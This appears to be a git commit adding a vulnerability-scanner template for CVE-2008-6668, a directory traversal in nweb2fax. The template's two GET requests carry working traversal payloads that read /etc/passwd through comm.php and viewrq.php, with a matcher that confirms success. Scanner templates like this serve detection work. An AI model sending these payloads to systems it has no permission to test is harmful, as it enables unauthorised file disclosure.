Create CVE-2008-6668.yaml
parent
7bd7a40793
commit
b4573b1392
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2008-6668
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: nweb2fax <= 0.2.7 Directory Traversal
|
||||||
|
description: Multiple directory traversal vulnerabilities in nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via .. in the id parameter to comm.php and var_filename parameter to viewrq.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/5856
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2008-6668
|
||||||
|
author: geeknik
|
||||||
|
severity: high
|
||||||
|
tags: nweb2fax,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/comm.php?id=../../../../../../../../../../etc/passwd"
|
||||||
|
- "{{BaseURL}}/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0:"
|
Loading…
Reference in New Issue